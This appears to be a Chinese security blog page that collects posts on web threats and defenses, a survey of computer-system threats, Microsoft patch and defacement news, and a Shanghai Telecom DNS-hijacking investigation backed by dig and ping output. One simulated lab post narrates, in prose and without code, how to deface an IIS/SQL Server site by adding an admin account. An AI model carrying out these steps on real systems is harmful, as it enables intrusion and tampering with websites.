Chinadu's Blog

企业及其雇员越来越依赖于互联网，不管是在家里、在路途中、在办公室中都是如此。这种依赖性在与多种最新的Web威胁结合之后，将会使企业比以往更加脆弱，更容易遭受攻击。近半年来的Web攻击都有一个鲜明的特点，在无需用户干预的情况下，这些威胁就可以进入网络，严重威胁着企业的数据安全、工作效率，直至企业的最终利益。

而且，由于Web内容和形式的多样性，其威胁的花样也是不断翻新。比方说，前些日子使得许多网站深受其害的SQL注入式攻击就采用了不同于以往的手段。前几天利用Flash player漏洞的攻击，也体现出这种威胁形式的变化性和无常性。面对新的威胁，加强防御是唯一的制胜之道。

Web威胁的种类

此处谈的种类虽不能代表全部全部，至少代表了最为严重的一些Web威胁。现在的黑客日益聪明，他们认识到通过互联网络搞点“外快”要远比炫耀自己的本领更加实惠。

前一段时间的“艳照门”事件和抗震救灾期间的“救灾视频”，都有黑客们的手脚在里面，他们往往用一些令人感兴趣的东西来吸引受害者，所谓愿者上钩。孰不知，这些表面的东西往往包含着恶意软件，甚至rootkit程序。根据赛门铁克的调查，以下这些可谓最具危险性的Web威胁：

可信任站点的漏洞：我们都有这样的看法，大的知名网站是相对安全的。黑客们也知道这一点，他们会想方设法修改这些网站的网页，将用户的浏览器重新导向到其精心打造的恶意站点，这个恶意站点看起来还是是非常可信的。但在用户向其中输入个人信息时，它们“统吃”。“吃”了你的还不算，还要在你的系统上种上点东西(如间谍软件等)，或者破坏你的邮件地址簿，肆意传播垃圾邮件等。

浏览器和浏览器插件的漏洞：前几天我们看到一些安全专家建议不要使用IE浏览器。其实其它的浏览器也并非无懈可击，只是漏洞暂时还不太多或者说是攻击者对其关注的程度还不够高而已。不管哪种浏览器，攻击者都可以利用其漏洞或其插件的漏洞将恶意软件下载并安装到用户计算机上，或者将用户指引到一个恶意站点。

终端用户：许多攻击者都是从终端用户下手的。许多企业面临的威胁主要是由于其针对笔记本电脑、桌面系统、服务器、未受保护的移动设备的安全策略不健全造成的。如空口令、关闭防火墙等都是具体表现。

可移动的存储设备：由于U盘、移动硬盘、MP3、MP4等设备的快速流行和使用，恶意软件也可以轻易地从外部的设备传输到网络系统中。此外，插到iPod中的插件也可以成为窃取系统数据的重要媒介。

网络钓鱼：前面笔者在谈到Web的新威胁时谈到，网络骗子伪造冒似金融网站的虚假站点欺骗消费者。它们还能够以金融公司作为其伪装，在电子邮件中诱骗消费者输入其个人机密信息。

僵尸网络：攻击者通过隐藏的程序控制大量的计算机系统并执行多任务，如发送垃圾邮件和发动拒绝服务攻击等。

键盘记录程序：黑客在用户的系统上安装可以记录用户击键的程序，并将记录的结果秘密地通过电子邮件发送到黑客的邮箱。

多重攻击：黑客使出“组合拳”，即将多种战术结合在一起(如综合运用键盘记录程序、僵尸网络、钓鱼等手段)来窃取用户的敏感信息。

此外，攻击者还可以通过间谍软件窃取个人的机密信息，并能够通过垃圾邮件传播病毒、间谍软件、木马等。

以上这些威胁并不代表全部，现在的web威胁日益体现出综合化，并向纵深发展。以前攻击者主要利用操作系统漏洞，现在对应用软件的漏洞越来越感兴趣；以前的SQL攻击可以检测，现在却越来越难；以前黑客们控制一两台计算机，现在可以通过一个网站攻击其它网站，并感染用户，进而构建僵尸网络，借以发动分布式拒绝服务攻击(DDoS)。因此任何企业都应当重视防范措施的多样性和多重性，不要依赖单纯的一种技术，有了UTM并不意味着万事大吉。为此笔者提供以下防护Web威胁的方法：

阻止对恶意服务器的访问

企业应建立恶意站点的清单，借助防火墙、UTM等设备，在桌面用户试图打开已知的恶意服务器的网页时，立即阻止这种企图。这样做不但有助于安全，还可以节省大量的带宽和网络资源。

仅允许对可信任站点的移动代码的访问

所谓移动代码是一段计算机程序，能够在计算机或网络之间传播，在未经授权的情况下，它可以修改计算机系统。如ActiveX，Java Scripts，Rootkit等都属于移动代码。虽然移动代码使得web更加生动活泼、富有活力，但它也为攻击者提供了深透进入桌面计算机的便利，

网关扫描

任何时候都不要假定用户一定拥有最新的反病毒定义，并运行着防火墙等软件，也不要认为正在访问的计算机都受到了良好的管理。企业可以在威胁进入网络之前，通过网关集中扫描恶意代码从而轻易地控制所有进入的Web通信。

依靠不同厂商的软硬件实施桌面和Web网关的扫描

不要一棵树上吊死。因为现代的攻击在发布之前都针对某些流行的反病毒机制进行了测试。企业应当通过恶意代码扫描工具的多样性来加强对威胁的检查和阻击能力。

经常更新桌面和服务器的补丁

这样做的原因是经常有新的漏洞出现。且不说零日漏洞，只要我们认识到多数的攻击都是通过利用未打补丁的应用程序和系统来传播的，那么也就会自觉的经常为系统打补丁。

桌面要安装反病毒程序并保持最新

企业要告诫用户不要认为安装反病毒程序会影响性能而禁用之。一台没有安装反病毒程序并能够保持升级的电脑不应当连接到互联网和企业内部网，也不应当访问光盘和移动存储设备。

仅准许访问通过所有浏览器检查的HTTPS网站

多数用户并不理解三个SSL浏览器检查的意义，也不能理解为什么不能访问没有通过全部三个检查的站点。SSL检查是指证书与所请求的URL之间的到期证书、不可信任的发行者、主机不匹配三个方面。

仅从可信任的网站下载可执行程序

许多用户都有这样的体验，在安装某个下载的工具时，它要求访问网络。而这种访问对普通而言，首先是不必要，因为我们仅需要其当前功能；二是风险很大，因为普通用户并不清楚访问网络程序的具体行为，而且也无法保障所访问的网络真正安全。而且，现在许多恶意软件都是将自己与一个冒似“忠良”的程序结合起来发布。这种程序在执行时，其中的恶意软件就会为所欲为。

不要访问以IP地址作为服务器的网站

近来的一些攻击更多地利用了安装有简单Web服务器功能的、受到损害的家用计算机。一些受害者多是通过IP地址被指引到家用电脑，而不是域名。实际上，真正合法的网站都会在URL中采用主机名。

仔细键入网站的URL，避免输入错误

任何一个正常的用户都不会愿意访问一个恶意的站点，但为什么还是屡屡中招
呢？对一些知名的网站的域名输入错误会将用户带到一些早就潜伏在那里等待用户上钩的网站。此外，如果用户的浏览器并没有打上最新的补丁，也有可能被偷渡式下载(drive-by download)安装恶意软件。

结束语

以上这些防御手段可以看出，多数措施需要企业的雇员或用户的配合。因为正是他们是网络链条中最薄弱的环节。所以对雇员等加强安全教育的力度和广度，强化用户的安全意识，提高全体工作人员的防范意识才能真正地对付各种不断变化的威胁。

计算机系统容易受到许多威胁从而造成各种各样损害导致严重损失。这些损害从由于错误而破坏数据库的安全性到火灾摧毁整个计算机中心。损害的原因是多种多样的，例如，看上去可信的员工欺骗系统的行为、外部黑客或粗心的数据录入员。由于很多损害永远也无法被发现，有些机构为了避免公众形象受损所以对损害情况加以掩盖，所以准确的评估计算机安全相关的损害是不可能的。不同的威胁其后果也有所不同：一些是影响数据的机密性或完整性而另一些则影响系统的可用性。这些威胁包括：
1、错误和遗漏
2、欺诈和盗窃
3、员工破坏
4、丧失物理和基础设施的支持
5、有害黑客
6、工业间谍
7、有害代码
8、外国政府间谍
9、对个人隐私的威胁
这里描述了如今系统运行环境中风险的基本情况。所提到的威胁和相关损害是基于其在当今计算环境中的普遍程度和严重程度以及其预期扩展形势而提出的。本清单并不详尽，有些威胁可以是不同领域的组合产物。这里描述的当前常见威胁概况可以为机构研究其自身的威胁环境提供帮助；但是由于这一话题涉及面比较广阔，所以特定系统所遭遇的威胁可能与这里讨论的有所不同 。
为了控制运行信息系统的风险，管理人和用户需要了解系统的缺陷和可能利用缺陷的威胁。对威胁环境的了解使系统管理人得以实施最具成本效益的安全措施。在有些情况下，管理人发现简单容忍预期损害更具有成本效益。这一决策应该基于风险分析的结果。

1. 错误和遗漏

错误和遗漏是数据和系统完整性的重要威胁。这些错误不仅由每天处理几百条交易的数据录入员造成，创建和编辑数据的任何类型的用户都可以造成。许多程序，特别是那些被设计用来供个人计算机用户使用的程序缺乏质量控制手段。但是，即使是最复杂的程序也不可能探测到所有类型的输入错误或遗漏。良好的意识和培训项目可以帮助机构减少错误和遗漏的数量和严重程度。

用户、数据录入员、系统操作员和程序员的工作中经常会出现直接或间接影响安全的错误。在有些情况下，错误是一种威胁，例如数据录入错误或编程错误会使系统崩溃。在另一些情况下，错误导致了缺陷。错误可以在系统生命周期的任何阶段发生。一项由计算机安全顾问、计算机系统安全和隐私咨询委员会的前成员Robert Courtney进行的关于计算机的经济损失的长期调查显示，机构百分之六十五的损失是错误和遗漏造成的。在私营和公共机构中，这种情况基本是一样的。
编程和开发的错误通常被称为“臭虫”，其严重程度从温和到灾难性不等。在1989年美国众议院科学、空间和技术委员会的研究报告《程序中的缺陷》中，调查和监督小组委员会成员对政府系统中此类问题的严重性作出了以下总结：
随着费用的不断增加，对于越来越大、越来越复杂的软件系统的稳定性、成本和准确性的关注也越来越多。随着计算机执行越来越关键的任务，其错误会导致经济混乱、事故，在极端的情况下会导致死亡，所以对此的关注也不断升温。
自从这份研究报告发表以来，软件工业发生了相当大的变化，软件质量有了可观的改善。但是关于软件的“恐怖故事“依然大量流传，报告中分析发现的基本根源和问题依然存在。虽然程序的质量有了很大的改善，减少了每1000行代码中包含的错误量，但是程序的规模同时也在扩大，这在很大程度上抵消了程序质量改进的好处。
安装和维护的错误是安全问题的另一个根源。例如，由美国正直和效率总统委员会（PCIE）在1988年进行的审计中发现，被调查的每十个大型计算机站点中就有一个存在会导致严重安全缺陷的安装和维护错误。

2. 欺诈和盗窃

计算机系统会受到欺诈和盗窃的伤害，这种伤害可以是通过“自动化“了的传统手段进行也可以是通过新的手段进行。例如，有人可能会使用计算机在大型帐户中稍微减少一小部分数量的金钱，期望这个微小的差异不会被调查。金融系统不是这种风险的唯一受害者。控制资源访问的系统（如时间和考勤系统、存货系统、学籍系统以及长途电话系统）都可能成为受害者。

计算机欺诈和盗窃可以是内部人所为也可以是外部人所为。欺诈主要是内部人（如系统的受权用户）所为。1993年《信息周刊》／Ernst＆Young公司研究发现百分之九十的首席信息官将“知道过多”信息的员工视为一种威胁 。美国司法部计算机犯罪调查部门指出“内部人构成了计算机系统的最大威胁” 。因为内部人既可以访问受害的计算机系统（包括其控制和流动的资源）又对系统比较熟悉，受权用户在进行计算机犯罪时处于有利的地位。内部人可以是普通用户（如职员）也可以是技术人员。了解机构运行情况的机构的前员工也可能是一种威胁，在其访问权限没有得到适当终止的时侯尤其如此。
另外，对于使用技术手段进行欺诈和盗窃，计算机硬件、和软件都容易被窃取。例如，由Safeware保险公司进行的一项研究发现，在1992年中由于盗窃损失的计算机的价值高达8亿8千2百万美金。

3. 员工破坏

员工最熟悉其雇主的计算机和应用，包括知道何种行为会导致最大的损害、故障或破坏。公共和私营机构中人员的不断缩减造成有一些人对整个机构都很熟悉，这些人可能会保留潜在的系统访问权（如系统帐户没有被及时删除） 。从数量上看，员工破坏事件比盗窃事件要少，但是这种事件造成的损失却很高。
《美国工作场所的破坏》的作者Martin Sprouse报告说，破坏的动机从利他主义到报复不等：
当员工在工作中感到受了欺骗、厌烦、疲倦、受到威胁或背叛的时侯，破坏将被当做获得工作满足感的直接手段，这种手段老板当然是不会同意的 。

4. 丧失物理和基础设施的支持

丧失基础设施的支持包括电力故障（中断、瞬间高压和电压不足）、丧失通信能力、水的中断和泄漏、下水管道问题、缺乏运输服务、火灾、洪水、国内混乱和罢工。这些损害包括如美国世贸中心爆炸和芝加哥隧道洪水这样的激烈事件，也包括像水管破裂这样的普通事件。基础设施的丧失通常导致系统停机，有时结果是在无法预料的。例如，在暴风雪的天气下员工无法上班，而计算机系统依然在工作。

5. 有害黑客

有害黑客这一术语，有时被称为黑客，是指未经授权侵入计算机的人。他们可以是外部人也可以是内部人。黑客行为的增加应该是与政府和企业联网数量的增长有关。1992年一项关于互联网站点（如一个计算机系统）的研究发现每隔几天就会有一次黑客的入侵尝试 。 <
br />黑客的威胁应该被认为是过去的或未来潜在的损害。虽然目前由黑客造成的损失远小于由内部盗窃和破坏造成的损失，但是黑客问题分布广泛而且情况严重。有害黑客行为的一个例子就是直接对公共电话系统的破坏。
美国科学院和国家安全电信咨询委员会的研究表明，黑客的行为不仅限于话费欺诈。也包括侵入电信系统（如交换机）的行为，这种行为造成了系统可用性的降低或中断。虽然还无法得到关于威胁或风险程度的结论，但是这些研究强调黑客的行为会造成严重的破坏 。
黑客威胁受到的关注通常会比其它更普遍更危险的威胁还要多。美国司法部计算机犯罪部门认为造成这种现象的原因有以下三种：
首先，黑客的威胁是最近才遭遇到的威胁。机构一直以来就关注内部员工的行为并能够采用惩戒手段减少这些威胁。但是，这些手段对于防止外部的不受员工规章约束的人来说是无效的。
其次，机构不知道黑客的目的，有些黑客只是浏览信息、有些盗窃信息、有些进行破坏。机构无法确定黑客的目的就会觉得其攻击会很严重。
第三，黑客的攻击会使人们觉得很脆弱，在不知道对方的身份的情况下尤其如此。例如，假如雇佣一名油漆工油漆房屋，有一次他偷窃了珠宝。邻居们不会因此感到威胁，也不会采取措施防备那个油漆工。但是，如果强盗闯入同一间房屋偷走了同样的珠宝，所有的邻居都会觉得自己是受害者并且感到很容易受到攻击。

6. 工业间谍

工业间谍是指从私营企业或政府收集专有数据以达到协助其它公司的目的的行为。工业间谍行为可能是公司为了提高自身的竞争力或政府为了帮助其国内企业所为。由政府派出的外国工业间谍通常被称为经济间谍。因为信息通常在计算机系统中进行处理和存储，所以计算机安全可以帮助防范这种威胁；但是，这无法减少由于受权的员工出卖信息而造成的威胁。
工业间谍在不断增加。1992年一项由美国工业安全学会（ASIS）资助的研究发现，对商业专有信息的盗窃自1985年以来上升了260％。数据指出，在1991年和1992年中所报告的损失有30％涉及到外国的参与。研究还发现，58％的盗窃是现有的正式员工所为。三种危害最大的被盗信息类型是价格信息、制造过程信息和产品开发及规格说明信息。其它被盗信息类型有客户清单、基础研究、销售数据、人事数据、补偿数据、成本数据、建议和战略计划 。
美国中央情报局指出，经济间谍领域中的主要目的是获取与技术相关的信息，但是美国的对外政策以及商品、利益和其它经济信息也是其目标。美国联邦调查局也发现，技术相关信息是主要目标，但是目标还包括企业的专有信息，如谈判地位和其它合同数据。

7. 有害代码

有害代码是指病毒、蠕虫、特洛伊木马、逻辑炸弹和其它“不受欢迎的软件”。有时人们会错误的认为这些只与个人计算机有关，事实上有害代码可以攻击其它平台。
1993年的一项病毒研究发现，已知病毒的数量呈指数速度增长，病毒事件的数量不是这样 。研究断定，病毒已经变得相当普遍，但是这仅仅是“逐步的”。北美商业领域中等到严重的PC-DOS病毒事件接近于每个季度每1000台PC发生一件，假设大多数这样的企业都有基本的防病毒保护，那么受感染的机器将是这个数字的3或4倍 。
有害代码所造成的实际损失主要来自系统的中断和修复系统所花费的人力资源。无论如何，费用是巨大的。

8. 外国政府间谍

在有些场合，可能会出现外国政府情报部门造成的威胁。除了可能的经济间谍之外，外国情报部门可能会为了进一步的情报工作而瞄准非保密系统。有些非保密信息可能对其有价值，如高官的旅行计划、国内防卫和应急准备情况、制造技术、卫星数据、人事和工资数据以及执法、调查和安全文件。具有管辖权的安全官员可以提供有关处理此类威胁的指导。

9. 对个人隐私的威胁

政府、信用局和私人公司积累了大量的关于个人的电子信息，结合计算机监控、处理和聚集大量关于个人信息的能力形成了对个人隐私的威胁。这些信息和技术结合的可能性越来越成为现代信息时代的隐忧。这通常被称为“独裁大哥”。为了防范此类侵害，在过去的很多年中，美国国会颁布了法律，如1974年隐私法案、1988年计算机匹配和隐私法案，它定义了政府所收集的个人信息的合法使用界限。
对个人隐私的威胁来自多个方面。在一些案件中，美国联邦和州雇员将个人信息出售给私人侦探或其它“信息掮客”。1992年发现了一桩类似的案件，美国司法部宣布逮捕了二十多人，他们涉嫌买卖美国社会保障总署（SSA）计算机文件中的信息。在调查中，审计员发现SSA 的雇员没有限制地访问了超过1.3亿条就业记录。另一项调查发现在一个IRS区域中有5％的员工浏览过朋友、亲属和名人的税收记录。有些员工使用这些信息骗取退税，但大多数只是出于好奇。

随着诸多此类案件的曝光，越来越多的人开始关注针对个人隐私的威胁。1993年七月在《MacWorld》杂志中一项特别报告中公布了Louis Harris＆Associates公司的民意调查数据，数据显示在1970年有33％的回答者关心个人隐私问题。到了1990年这个数字跃升至79％ 。
虽然对个人隐私威胁的程度和及其造成的社会成本难以测量，但是很明显，强大的信息技术有理由使人们担心政府和公司变成“独裁大哥”。增强此类意识是必要的。

新闻来源:腾讯科技
据国外媒体报道，微软计划下周发布11款补丁软件，其中4款的安全等级被评定为“危急”（critical）。

微软本周四在一份有关补丁软件的公告中表示，这些补丁软件将修正Windows活动目录、IE、Excel和Microsoft Host Integration Server中的“危急”缺陷。

微软称，安全等级为“危急”的活动目录缺陷只影响Windows 2000 Server，Excel缺陷影响Windows和Mac OS X版Excel。

微软还将发布6款安全等级为“重要”（important）的Windows补丁软件和1款安全等级为“中等”（moderate）的Office补丁软件。

微软计划美国太平洋时间本周二上午10点左右发布这些补丁软件。

对于微软英国网站来说,当地时间周三是黑色的一天,他们被一个沙特阿拉伯的少年黑客玩得团团转.在微软英国的主页查询结果页上出现了这位少年摇旗呐喊的照片.
微软欧洲,中东和非洲首席安全代表Roger Halbheer周五确认了这一消息.问题已经被修复,但明显暴露出一个庞大的软件公司仍然会给黑客留下机会.
黑客名为 "rEmOtEr",它利用微软的SQL程序漏洞进行了注入攻击,未经授权访问数据库,并让服务器查询返回错误信息.

SQL注入攻击在网络安全业界有愈演愈烈的态势,多家厂商表示他们要研究数据库保护技术来防止未经授权的注入.安全人员Davie称不但是微软,所有人都面临着这一威胁.

主题：利用系统漏洞替换目标网站网页并加入恶意代码VMWARE
模拟环境： Hacker：IP：192.168.123.101
工具：弱点扫描工具、 网页上传工具
Server：IP：192.168.123.100 服务：IIS5.0、 SQLServer2000、ASP程式、本机帐号

模拟过程： Hacker首先使用弱点扫描工具发现目标Server192.168.123.10 0(DNS名称暂订为www.xyz.com.tw非真实主机)， 具有IISWINCGI的弱点(注：该弱点非常老旧除非管理者都没修正， 不然应该不会出现才对。)， 点选该连结进入后发现可以看见192.168.123.100的Web资料夹内存放资 料与该网站的实体路径名称， 寻找目标Web网站的网页名称与则可得知其放置的实体位置为[C: \Inetpub\wwwroot\STORE\h4x0r\4evil.htm] 。 目标想要置换的网页名称为[happyL.htm]、 其猜测出的IIS主目录路径为[c: \inetpub\wwwroot\STORE]。 将原本的正常的[happyL.htm]网页[另存新档]取得其网页与它原来一模一样 之副本，再将此副本修改加入恶意连结[]与变更网页内的超连结[]之后备用。 再使用网页上传工具利用SQLServer与WebServer的弱点来新增具有管理 权限的[本机使用者帐号为shanlu]， 并利用此帐号来上传[制作好且具有恶意连结的伪造网页]至目标电脑的预设IIS主目录 路径中[覆盖]原来的4evil.htm相同名称的档案， 达到覆盖或置换网页之目的。 注： 此手法只能针对附档名为[htm、html]来做置换之目的， 如果附档名为[asp、php]等网页程式则无法使用此手法。 该手法只是呈现利用[古老漏洞]来执行猜测网站路径及权限泄漏， 当然[新产生的漏洞]仍然可以循类似方式来达到目的，所以仍须定时不断修正漏洞。 防治手段： 修正与修补IIS5.0与SQLServer的弱点， 没有弱点就比较不容易达成网页置换， 尤其是具有[远端控制或权限泄漏]的弱点一定要优先修正。 更改IIS预设的首页名称(不要叫做default或index)。 更改预设IIS主目录路径(不要在c: \inetpub\wwwroot或与其相关的子资料夹之下)。 建置具第七层应用程之防火墙或IDS/IDP等多层次资讯安全架构， 原因为大多数设定良好的防火墙或IDS/IDP设备均可阻挡此类的手法。

据本人查证,上海电信在近一个月内对其所属的DNS服务器做了某些明显违背互联网规范的行为,导致出现将客户浏览器导向其自身所辖的114号码百事通,此种行为非常令人不齿.使用上海电信宽带接入的朋友可能最近也经常像我一样在浏览网站时莫名其妙地输入网址后转向了114查询的页面,此类事故在以前曾听过有类似的传言,而以前我个人并未碰到,所以并不在意,但如今我是天天被114这个破烂页面骚扰,于是也不得不仔细找找原因了.

首先解释一下什么是DNS劫持。严格来说上海电信的这种行为不能算是DNS劫持，但似乎除了这个名词也没有更适合的词来形容这种行为了，所以就需要解释一下DNS劫持的来龙去脉，免得有人说我误导初学者。
DNS 劫持是网络安全界常见的一个名词，意思是通过某些手段取得某一目标域名的解析记录控制权，进而修改此域名的解析结果，通过此修改将对此域名的访问由原先的 IP地址转入到自己指定的IP，从而实现窃取资料或者破坏原有正常服务的目的。举个例子，例如 www.sohu.com 原指向1.1.1.1，这个 IP是sohu正常服务的服务器IP。而某黑人拿到了修改 sohu.com 域名解析的权利，将其解析记录修改为2.2.2.2，则修改后对于 www.sohu.com 的访问都会指向2.2.2.2这个IP。此黑人在2.2.2.2这个他自己所有的IP上放了一个完全仿冒的sohu主页，只是将登陆sohu邮箱的这个界面改为把客户填写的邮箱名和密码记录下来。这样普通客户访问 www.sohu.com 时看到的是表面为sohu主页，而实际为假冒页面的李鬼了。此时客户如果继续登陆其sohu邮箱，则其帐户就被黑人拿到了。

回到主题---有关上海电信的DNS劫持行为。在我发现近期浏览网页出现异常的这段时间里，我注意搜索了一下关于这方面的讨论，发现上海电信的这种不道德行为确实是存在的，只是我以前恰好没有入套而已。根据我搜索来的资料，在06年下半年的时间里，上海电信实现了通过IE浏览器搜索功能来推送电信的114 搜索。其具体原理是与IE本身的实现相关。简单来说，IE对于输入的网址，如果无法正常解析其域名或者输入的根本就不是域名的话，会调用它自身定义的搜索引擎来搜索这个地址。这个搜索引擎，默认是MSN（在之前是3721，但06年微软终止了与3721的合同，所以是MSN）。所以此时地址会转向 http://auto.search.msn.com。上海电信为了将这部分流量导入自己的怀里，做了2种小动作：
•第一是在他们的星空XX拨号软件里，只要安装这个软件，就会修改注册表将IE的搜索引擎改为 http://search.114.vnet.cn ，于是这些流量被导入到114，此做法尚可忍受，因为毕竟软件是可以选择的，而修改也是可以改回来的。
•第二就是DNS劫持了，这就是公然违反网络标准以及违反互联网道德的行为了。具体细节就是在上海电信的几个DNS服务器中作手脚，将对auto.search.msn.com这个域名解析的应答篡改为他们自己的IP地址，这是很容易查出来的：
首先看由Root服务器下来的权威结果，我们用DNSStuff这个在线网站测试，URL为 http://www.dnsstuff.com/tools/lookup.ch?name=auto.search.msn.com&type=A ，可以看到如下结果：

Response:

Domain Type Class TTL Answer
a134.g.akamai.net.6528acf.1.cn.akamaitech.net. A IN 20 67.130.109.38
a134.g.akamai.net.6528acf.1.cn.akamaitech.net. A IN 20 67.130.109.16

NOTE: One or more CNAMEs were encountered. auto.search.msn.com is really a134.g.akamai.net.6528acf.1.cn.akamaitech.net. [auto.search.msn.com->sea.search.msn.com->sea.search.msn.com.nsatc.net->
search.msn.com.edgesuite.net->a134.g.akamai.net->
a134.g.akamai.net.6528acf.1.cn.akamaitech.net]

再来看我们使用了上海热线DNS所解析出来的结果，我这里用BIND提供的dig工具来取结果：

# dig @202.96.209.5 A auto.search.msn.com

; < <>> DiG 9.2.4 < <>> @202.96.209.5 A auto.search.msn.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 18248
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 5, ADDITIONAL: 4

;; QUESTION SECTION:
;auto.search.msn.com. IN A

;; ANSWER SECTION:
auto.search.msn.com. 86400 IN A 218.30.64.194

;; AUTHORITY SECTION:
auto.search.msn.com. 86400 IN NS ns-puxi.online.sh.cn.
auto.search.msn.com. 86400 IN NS ns-pudong.online.sh.cn.
auto.search.msn.com. 86400 IN NS ns-pd.online.sh.cn.
auto.search.msn.com. 86400 IN NS ns-px.online.sh.cn.
auto.search.msn.com. 86400 IN NS ns-px2.online.sh.cn.

;; ADDITIONAL SECTION:
ns-pd.online.sh.cn. 86400 IN A 202.96.209.133
ns-px.online.sh.cn. 86400 IN A 202.96.209.5
ns-puxi.online.sh.cn. 86400 IN A 202.96.209.5
ns-pudong.online.sh.cn. 86400 IN A 202.96.209.133

;; Query time: 23 msec
;; SERVER: 202.96.209.5#53(202.96.209.5)
;; WHEN: Wed Mar 14 14:51:08 2007
;; MSG SIZE rcvd: 236

可以看到auto.search.msn.com被解析到了218.30.64.194这个IP，这显然是不对的，而本应属于微软的msn域名的NS记录竟然为5个上海热线的域名服务器，很明显猫腻就在这里了。
那我们就顺便查查218.30.64.194这个IP的所有，通过IP whois信息库，查询方法也是通过方便至极的DNSStuff，URL如下： http://www.dnsstuff.com/tools/whois.ch?ip=218.30.64.194 ，摘录一下结果：

WHOIS results for 218.30.64.194
Generated by www.DNSstuff.com
Location: China [City: Shenzhen, Guangdong]

ARIN says that this IP belongs to APNIC; I'm looking it up there.

% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 218.30.64.0 - 218.30.64.255
netname: CHINANET-CN
country: CN
descr: Chinavnet
descr: No.31 ,jingrong street,beijing
admin-c: CH93-AP
tech-c: CH93-AP
status: ALLOCATED NON-PORTABLE
changed: *****@chinatelecom.com.cn 20051026
mnt-by: MAINT-CHINANET
source: APNIC

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: *********@ns.chinanet.cn.net
address: No.31 ,jingrong street,beijing
address: 100032
phone: +86-10-58501724
fax-no: +86-10-58501724
country: CN
changed: *****@chinatelecom.com.cn 20051212
mnt-by: MAINT-CHINANET
source: APNIC

很明显这个IP是中国电信的，而msn的域名就是这样被强奸到了中国电信的IP。

以上就是06年中上海电信所做的手脚了，其实对于如此行为我个人还是可以忍受的，因为第一我不会去装什么星空XXX，即使装了我也有办法不用你的东西。第二我不用MSN的搜索，你劫持了它对我没什么影响。然而，从最近一段时间的异常来看，事情显然已经不只是这个地步了，因为我在用各种浏览器各种搜索引擎的时候都碰到了被转向了114的情况，再加上我个人工作所维护的一些邮件服务器最近发现的怪异情况，我有理由怀疑上海电信在DNS上做了更令人不齿的行为。很不幸，我只是简单测试了一下，就发现确实如此，这次的行为可谓明刀明枪的抢劫了：

C:>ping notpresentxxxxxxxxxx.cn

Pinging notpresentxxxxxxxxxx.cn [218.83.175.154] with 32 bytes of data:

Reply from 218.83.175.154: bytes=32 time=124ms TTL=242
Reply from 218.83.175.154: bytes=32 time=122ms TTL=242
Reply from 218.83.175.154: bytes=32 time=134ms TTL=242
Reply from 218.83.175.154: bytes=32 time=134ms TTL=242

Ping statistics for 218.83.175.154:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 122ms, Maximum = 134ms, Average = 128ms
C:>ping dsfsdofhetfowefuwdf.com

Pinging dsfsdofhetfowefuwdf.com [218.83.175.154] with 32 bytes of data:

Reply from 218.83.175.154: bytes=32 time=126ms TTL=242
Reply from 218.83.175.154: bytes=32 time=125ms TTL=242
Reply from 218.83.175.154: bytes=32 time=116ms TTL=242
Reply from 218.83.175.154: bytes=32 time=118ms TTL=242

Ping statistics for 218.83.175.154:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 116ms, Maximum = 126ms, Average = 121ms

C:>ping gherogfhgnewlffefh.com

Pinging gherogfhgnewlffefh.com [218.83.175.154] with 32 bytes of data:

Reply from 218.83.175.154: bytes=32 time=674ms TTL=242
Reply from 218.83.175.154: bytes=32 time=1007ms TTL=242
Reply from 218.83.175.154: bytes=32 time=1002ms TTL=242
Reply from 218.83.175.154: bytes=32 time=812ms TTL=242

Ping statistics for 218.83.175.154:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 674ms, Maximum = 1007ms, Average = 873ms

相信会用ping命令的网友们自然能看得懂这段输出的意思，简单来说，我ping了3个根本不存在的域名，本应出现找不到域名错误(hostname not found)，然而这显然不存在的3个域名竟然能得到解析结果，而无一例外的指向同一个IP----218.83.175.154。这个IP是什么我想大家应该也会非常有兴趣知道，点一下看看吧http://218.83.175.154。照样不能忘记把这个IP的whois信息拿出来作证据： http://www.dnsstuff.com/tools/whois.ch?ip=218.83.175.154 ，顺便贴出来：

WHOIS results for 218.83.175.154
Generated by www.DNSstuff.com
Location: China [City: Shanghai, Shandong]

ARIN says that this IP belongs to APNIC; I'm looking it up there.

% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 218.78.0.0 - 218.83.255.255
netname: CHINANET-SH
descr: CHINANET Shanghai province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: XI5-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET-SH
mnt-routes: MAINT-CHINANET-SH
status: ALLOCATED PORTABLE
changed: **********@apnic.net 20060427
source: APNIC

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: *********@ns.chinanet.cn.net
address: No.31 ,jingrong street,beijing
address: 100032
phone: +86-10-58501724
fax-no: +86-10-58501724
country: CN
changed: *****@chinatelecom.com.cn 20051212
mnt-by: MAINT-CHINANET
source: APNIC

person: Wu Xiao Li
address: Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
country: CN
phone: +86-21-63630562
fax-no: +86-21-63630566
e-mail: ********@mail.online.sh.cn
nic-hdl: XI5-AP
mnt-by: MAINT-CHINANET-SH
changed: ********@mail.online.sh.cn 20010510
source: APNIC

铁证如山，看你上海电信还如何抵赖，目前我自己发现的出现问题的DNS服务器有202.96.209.5，202.96.209.6， 202.96.209.133，202.96.209.134，都为上海电信ADSL的DHCP默认指派的DNS，应该还有数个服务器应该也是类似，只是我没有去求证。

做为中国最大的ISP，发布广告无可厚非，但却打着官方的旗号公然破坏互联网基础设施，公然违反互联网RFC，真可谓给国内各大企业带了个好头，再加上CNNIC的流氓行为，中国互联网还有什么前途？！我作为IT网络业界的一个普通技术人员，对此现状真的感到深深的悲哀。

现在唯一还能让我高兴起来的事情，就是似乎这个转入到114查询的关键字似乎是随机选取的，经常会出现让人哭笑不得的结果，莫非电信的技术们也开始学习玩无厘头风格了？

